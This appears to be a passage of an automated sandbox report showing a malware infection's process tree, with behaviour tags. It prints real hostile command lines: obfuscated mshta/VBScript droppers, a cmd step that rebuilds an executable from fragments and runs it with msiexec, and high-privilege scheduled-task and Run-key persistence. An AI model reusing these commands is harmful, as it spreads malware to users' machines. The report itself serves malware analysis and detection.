C:\Users\Admin\Pictures\Adobe Films\2AdEKiwtmbqyhsj6CH0d8OOg.exe
"C:\Users\Admin\Pictures\Adobe Films\2AdEKiwtmbqyhsj6CH0d8OOg.exe"
7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
PID:5636

C:\Users\Admin\Pictures\Adobe Films\ol5YmV2wvAFgWhfLpI6sFGxV.exe
"C:\Users\Admin\Pictures\Adobe Films\ol5YmV2wvAFgWhfLpI6sFGxV.exe"
7⤵
- Executes dropped EXE
PID:5628

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5628 -s 280
8⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:2660

C:\Users\Admin\Pictures\Adobe Films\Y9q4umXmKpU5HwdORafbp7tB.exe
"C:\Users\Admin\Pictures\Adobe Films\Y9q4umXmKpU5HwdORafbp7tB.exe"
7⤵
- Executes dropped EXE
PID:5616

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5616 -s 276
8⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:4900

C:\Users\Admin\Pictures\Adobe Films\TxhAgmivL8nXh1WsCz8WWApf.exe
"C:\Users\Admin\Pictures\Adobe Films\TxhAgmivL8nXh1WsCz8WWApf.exe"
7⤵
- Executes dropped EXE
- Drops file in Program Files directory
PID:5604

C:\Program Files (x86)\Company\NewProduct\cutm3.exe
"C:\Program Files (x86)\Company\NewProduct\cutm3.exe"
8⤵
- Executes dropped EXE
PID:5276

C:\Program Files (x86)\Company\NewProduct\jg1_1faf.exe
"C:\Program Files (x86)\Company\NewProduct\jg1_1faf.exe"
8⤵
- Executes dropped EXE
- Checks whether UAC is enabled
PID:6120

C:\Users\Admin\Pictures\Adobe Films\xP3lXahcreRzN4sNNs4LM_pJ.exe
"C:\Users\Admin\Pictures\Adobe Films\xP3lXahcreRzN4sNNs4LM_pJ.exe"
7⤵
- Executes dropped EXE
PID:5592

C:\Users\Admin\Pictures\Adobe Films\3USwTq_PDXPFVovcXAHaxe8_.exe
"C:\Users\Admin\Pictures\Adobe Films\3USwTq_PDXPFVovcXAHaxe8_.exe"
7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5844

C:\Users\Admin\Pictures\Adobe Films\qtKktsiKHVx_s5cgtM6J_oZ3.exe
"C:\Users\Admin\Pictures\Adobe Films\qtKktsiKHVx_s5cgtM6J_oZ3.exe"
7⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
PID:5836

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
8⤵
PID:5416

C:\Users\Admin\Pictures\Adobe Films\mTBH40ipIoAzB8ZBvF4Nd0YN.exe
"C:\Users\Admin\Pictures\Adobe Films\mTBH40ipIoAzB8ZBvF4Nd0YN.exe"
7⤵
PID:5796

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
8⤵
- Creates scheduled task(s)
PID:6208

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
8⤵
- Creates scheduled task(s)
PID:6200

C:\Users\Admin\Pictures\Adobe Films\OjO1XjmvyvOzFhCrdsLx7HZj.exe
"C:\Users\Admin\Pictures\Adobe Films\OjO1XjmvyvOzFhCrdsLx7HZj.exe"
7⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:5868

C:\Users\Admin\Pictures\Adobe Films\k1oxhH2IlsZGv0BtFN8mrxCf.exe
"C:\Users\Admin\Pictures\Adobe Films\k1oxhH2IlsZGv0BtFN8mrxCf.exe"
7⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:6036

C:\Users\Admin\Pictures\Adobe Films\5nuU3bgJ7h49V0zhwwOhIC6M.exe
"C:\Users\Admin\Pictures\Adobe Films\5nuU3bgJ7h49V0zhwwOhIC6M.exe"
7⤵
- Executes dropped EXE
PID:5968

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5968 -s 276
8⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:2276

C:\Users\Admin\Pictures\Adobe Films\_QR51lE1SkWLIp57RuB3P7od.exe
"C:\Users\Admin\Pictures\Adobe Films\_QR51lE1SkWLIp57RuB3P7od.exe"
7⤵
- Executes dropped EXE
PID:5908

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VBsCRIPt:cLose( creAteObjecT("WScRipT.SHElL" ). RuN ( "CMd /r CopY /y ""C:\Users\Admin\Pictures\Adobe Films\_QR51lE1SkWLIp57RuB3P7od.exe"" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP & If """"== """" for %K iN ( ""C:\Users\Admin\Pictures\Adobe Films\_QR51lE1SkWLIp57RuB3P7od.exe"" ) do taskkill -im ""%~NxK"" -F " ,0, trUE ) )
8⤵
PID:4768

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /r CopY /y "C:\Users\Admin\Pictures\Adobe Films\_QR51lE1SkWLIp57RuB3P7od.exe" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP &If ""== "" for %K iN ( "C:\Users\Admin\Pictures\Adobe Films\_QR51lE1SkWLIp57RuB3P7od.exe" ) do taskkill -im "%~NxK" -F
9⤵
PID:4452

C:\Windows\SysWOW64\taskkill.exe
taskkill -im "_QR51lE1SkWLIp57RuB3P7od.exe" -F
10⤵
- Kills process with taskkill
PID:6556

C:\Users\Admin\AppData\Local\Temp\8pWB.eXE
8pWB.eXe /pO_wtib1KE0hzl7U9_CYP
10⤵
PID:6544

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VBsCRIPt:cLose( creAteObjecT("WScRipT.SHElL" ). RuN ( "CMd /r CopY /y ""C:\Users\Admin\AppData\Local\Temp\8pWB.eXE"" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP & If ""/pO_wtib1KE0hzl7U9_CYP ""== """" for %K iN ( ""C:\Users\Admin\AppData\Local\Temp\8pWB.eXE"" ) do taskkill -im ""%~NxK"" -F " ,0, trUE ) )
11⤵
PID:1668

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /r CopY /y "C:\Users\Admin\AppData\Local\Temp\8pWB.eXE" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP &If "/pO_wtib1KE0hzl7U9_CYP "== "" for %K iN ( "C:\Users\Admin\AppData\Local\Temp\8pWB.eXE" ) do taskkill -im "%~NxK" -F
12⤵
PID:6236

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VbScRIpT: close (crEaTEOBject ("WSCRIPt.SheLl" ). rUn ("C:\Windows\system32\cmd.exe /c EcHO | seT /p = ""MZ"" > 1AQCPNL9.1 &CoPy /b /Y 1AqCPnL9.1 +HxU0.m + HR0NM.yl + _AECH.7+ ThBtZ22Y.U +1MRAv8.M + QZ5UW.aQ+ KKAyEq.00 N3V4H8H.sXy & STARt msiexec.exe -y .\N3V4H8H.SXY " ,0 , TruE ) )
11⤵
PID:6496

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c EcHO | seT /p = "MZ" > 1AQCPNL9.1 &CoPy /b /Y 1AqCPnL9.1 +HxU0.m + HR0NM.yl+ _AECH.7+ ThBtZ22Y.U +1MRAv8.M + QZ5UW.aQ+ KKAyEq.00 N3V4H8H.sXy & STARt msiexec.exe -y .\N3V4H8H.SXY
12⤵
PID:5284

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" EcHO "
13⤵
PID:4884

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" seT /p = "MZ" 1>1AQCPNL9.1"
13⤵
PID:2268

C:\Windows\SysWOW64\msiexec.exe
msiexec.exe -y .\N3V4H8H.SXY
13⤵
- Loads dropped DLL
PID:2168

C:\Users\Admin\Pictures\Adobe Films\eRm2UEGoaamhtmpVIcYhWGvs.exe
"C:\Users\Admin\Pictures\Adobe Films\eRm2UEGoaamhtmpVIcYhWGvs.exe"
7⤵
PID:4052

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Mon173a360b525.exe
5⤵
PID:1720

C:\Users\Admin\AppData\Local\Temp\7zS039332F3\Mon173a360b525.exe
Mon173a360b525.exe
6⤵
- Executes dropped EXE
PID:4244

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4244 -s 248
7⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:5364

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Mon17afe24e0084db3.exe
5⤵
PID:3440

C:\Users\Admin\AppData\Local\Temp\7zS039332F3\Mon17afe24e0084db3.exe
Mon17afe24e0084db3.exe
6⤵
- Executes dropped EXE
PID:1448

C:\Users\Admin\AppData\Local\Temp\7zS039332F3\Mon17afe24e0084db3.exe
"C:\Users\Admin\AppData\Local\Temp\7zS039332F3\Mon17afe24e0084db3.exe" -u
7⤵
- Executes dropped EXE
PID:676

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Mon179f74c0ff3cf1f.exe
5⤵
PID:4480

C:\Users\Admin\AppData\Local\Temp\7zS039332F3\Mon179f74c0ff3cf1f.exe
Mon179f74c0ff3cf1f.exe
6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:2284

C:\Users\Admin\Pictures\Adobe Films\YDuZDUP5T7tinek32yErj9ep.exe
"C:\Users\Admin\Pictures\Adobe Films\YDuZDUP5T7tinek32yErj9ep.exe"
7⤵
- Executes dropped EXE
PID:1968

C:\Users\Admin\Pictures\Adobe Films\7wymZY6JAhs0Yytu5UrodZ4g.exe
"C:\Users\Admin\Pictures\Adobe Films\7wymZY6JAhs0Yytu5UrodZ4g.exe"
7⤵
- Executes dropped EXE
- Drops file in Program Files directory
PID:5544

C:\Users\Admin\Documents\wC7a3mAq6divphMXN3a2VSwI.exe
"C:\Users\Admin\Documents\wC7a3mAq6divphMXN3a2VSwI.exe"
8⤵
PID:6568

C:\Users\Admin\Pictures\Adobe Films\thIWfskL1vCjCzPbfOYQb_kK.exe
"C:\Users\Admin\Pictures\Adobe Films\thIWfskL1vCjCzPbfOYQb_kK.exe"
9⤵
- Executes dropped EXE
- Drops file in Program Files directory
PID:5796

C:\Users\Admin\Pictures\Adobe Films\fUoT72SvbR3Ga2dO5W4ARQMW.exe
"C:\Users\Admin\Pictures\Adobe Films\fUoT72SvbR3Ga2dO5W4ARQMW.exe"
9⤵
PID:1588

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1588 -s 276
10⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:6180

C:\Users\Admin\Pictures\Adobe Films\oAF1M64bSrKqv7RfA3esx606.exe
"C:\Users\Admin\Pictures\Adobe Films\oAF1M64bSrKqv7RfA3esx606.exe"
9⤵
PID:5588

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5588 -s 272
10⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:4004

C:\Users\Admin\Pictures\Adobe Films\dpJunLr371JkufBb9Sa6IrgZ.exe
"C:\Users\Admin\Pictures\Adobe Films\dpJunLr371JkufBb9Sa6IrgZ.exe"
9⤵
PID:6364

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6364 -s 1732
10⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:6932

C:\Users\Admin\Pictures\Adobe Films\Q6BA7xD1yn8LwpqBVW2fhkGl.exe
"C:\Users\Admin\Pictures\Adobe Films\Q6BA7xD1yn8LwpqBVW2fhkGl.exe"
9⤵
PID:556

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\Pictures\Adobe Films\Q6BA7xD1yn8LwpqBVW2fhkGl.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If """" == """" for %M in (""C:\Users\Admin\Pictures\Adobe Films\Q6BA7xD1yn8LwpqBVW2fhkGl.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )
10⤵
PID:4252

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\Pictures\Adobe Films\Q6BA7xD1yn8LwpqBVW2fhkGl.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""=="" for %M in ("C:\Users\Admin\Pictures\Adobe Films\Q6BA7xD1yn8LwpqBVW2fhkGl.exe" ) do taskkill -f -iM "%~NxM"
11⤵
PID:1516

C:\Windows\SysWOW64\taskkill.exe
taskkill -f -iM "Q6BA7xD1yn8LwpqBVW2fhkGl.exe"
12⤵
- Kills process with taskkill
PID:3692

C:\Users\Admin\Pictures\Adobe Films\F5nTnax4UWIiEaWELkAwCNkv.exe
"C:\Users\Admin\Pictures\Adobe Films\F5nTnax4UWIiEaWELkAwCNkv.exe"
9⤵
PID:1056

C:\Users\Admin\Pictures\Adobe Films\jK38VdBcuIrcolJ0r0Xz_kdt.exe
"C:\Users\Admin\Pictures\Adobe Films\jK38VdBcuIrcolJ0r0Xz_kdt.exe"
9⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:6500

C:\Users\Admin\Pictures\Adobe Films\jK38VdBcuIrcolJ0r0Xz_kdt.exe
"C:\Users\Admin\Pictures\Adobe Films\jK38VdBcuIrcolJ0r0Xz_kdt.exe" -u
10⤵
PID:1400

C:\Users\Admin\Pictures\Adobe Films\aP0QyoZ9ZbAPrsQoV0wMtiQF.exe
"C:\Users\Admin\Pictures\Adobe Films\aP0QyoZ9ZbAPrsQoV0wMtiQF.exe"
9⤵
- Loads dropped DLL
PID:5888

C:\Users\Admin\AppData\Roaming\Calculator\setup.exe
C:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=1
10⤵
- Loads dropped DLL
- Adds Run key to start application
PID:5864

C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--ZgwMku75"
11⤵
- Loads dropped DLL
PID:232

C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self --monitor-self-argument=--type=crashpad-handler "--monitor-self-argument=--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --monitor-self-argument=/prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x204,0x208,0x20c,0x1f8,0x210,0x7ff8f582dec0,0x7ff8f582ded0,0x7ff8f582dee0
12⤵
PID:5616

C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --no-periodic-tasks --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x13c,0x140,0x144,0x118,0x148,0x7ff6b1f99e70,0x7ff6b1f99e80,0x7ff6b1f99e90
13⤵
PID:4660

C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1740,7320456359738485372,260485338334516899,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw232_1188560560" --mojo-platform-channel-handle=1756 /prefetch:8
12⤵
PID:7360

C:\Users\Admin\Pictures\Adobe Films\zjEjCO8pi62KmCRpRMXWBlTs.exe
"C:\Users\Admin\Pictures\Adobe Films\zjEjCO8pi62KmCRpRMXWBlTs.exe"
9⤵
PID:5360

C:\Users\Admin\AppData\Local\Temp\is-6KH11.tmp\zjEjCO8pi62KmCRpRMXWBlTs.tmp
"C:\Users\Admin\AppData\Local\Temp\is-6KH11.tmp\zjEjCO8pi62KmCRpRMXWBlTs.tmp" /SL5="$A002C,506127,422400,C:\Users\Admin\Pictures\Adobe Films\zjEjCO8pi62KmCRpRMXWBlTs.exe"
10⤵
- Loads dropped DLL
PID:3616

C:\Users\Admin\AppData\Local\Temp\is-JLESF.tmp\DYbALA.exe
"C:\Users\Admin\AppData\Local\Temp\is-JLESF.tmp\DYbALA.exe" /S /UID=2709
11⤵
- Drops file in Drivers directory
- Adds Run key to start application
- Drops file in Program Files directory
PID:6876

C:\Program Files\Windows Mail\BPXRIUMWPK\foldershare.exe
"C:\Program Files\Windows Mail\BPXRIUMWPK\foldershare.exe" /VERYSILENT
12⤵
- Suspicious behavior: GetForegroundWindowSpam
PID:6600

C:\Users\Admin\AppData\Local\Temp\06-59c0b-b95-c5b9e-e6fd91a7314c4\Lamaxaekety.exe
"C:\Users\Admin\AppData\Local\Temp\06-59c0b-b95-c5b9e-e6fd91a7314c4\Lamaxaekety.exe"
12⤵
PID:1156

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e6
13⤵
- Adds Run key to start application
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
PID:11812

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8fe6846f8,0x7ff8fe684708,0x7ff8fe684718
14⤵
PID:11836

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1832,17222404174732898860,8081237564875834871,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2104 /prefetch:2
14⤵
PID:12052

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1832,17222404174732898860,8081237564875834871,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2152 /prefetch:3
14⤵
PID:12068

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1832,17222404174732898860,8081237564875834871,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2776 /prefetch:8
14⤵
PID:12120

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1832,17222404174732898860,8081237564875834871,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3304 /prefetch:1
14⤵
PID:12436

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1832,17222404174732898860,8081237564875834871,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3320 /prefetch:1
14⤵
PID:12496

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1832,17222404174732898860,8081237564875834871,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5104 /prefetch:8
14⤵
PID:12848

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1832,17222404174732898860,8081237564875834871,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5104 /prefetch:8
14⤵
PID:12892

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1832,17222404174732898860,8081237564875834871,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5092 /prefetch:2
14⤵
PID:13372

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1832,17222404174732898860,8081237564875834871,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3012 /prefetch:1
14⤵
PID:13752

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1832,17222404174732898860,8081237564875834871,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3828 /prefetch:1
14⤵
PID:13916

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1832,17222404174732898860,8081237564875834871,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5612 /prefetch:1
14⤵
PID:14696

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1832,17222404174732898860,8081237564875834871,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4516 /prefetch:1
14⤵
PID:14848

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1832,17222404174732898860,8081237564875834871,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5908 /prefetch:1
14⤵
PID:14868

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1832,17222404174732898860,8081237564875834871,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5296 /prefetch:1
14⤵
PID:15496

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1832,17222404174732898860,8081237564875834871,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4496 /prefetch:1
14⤵
PID:15652

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1832,17222404174732898860,8081237564875834871,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3344 /prefetch:1
14⤵
PID:16264

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1832,17222404174732898860,8081237564875834871,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4616 /prefetch:1
14⤵
PID:16444

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1832,17222404174732898860,8081237564875834871,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4472 /prefetch:8
14⤵
PID:17020

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1832,17222404174732898860,8081237564875834871,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5548 /prefetch:1
14⤵
PID:17228

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1832,17222404174732898860,8081237564875834871,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6492 /prefetch:1
14⤵
PID:17364

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1832,17222404174732898860,8081237564875834871,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3496 /prefetch:1
14⤵
PID:17460

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
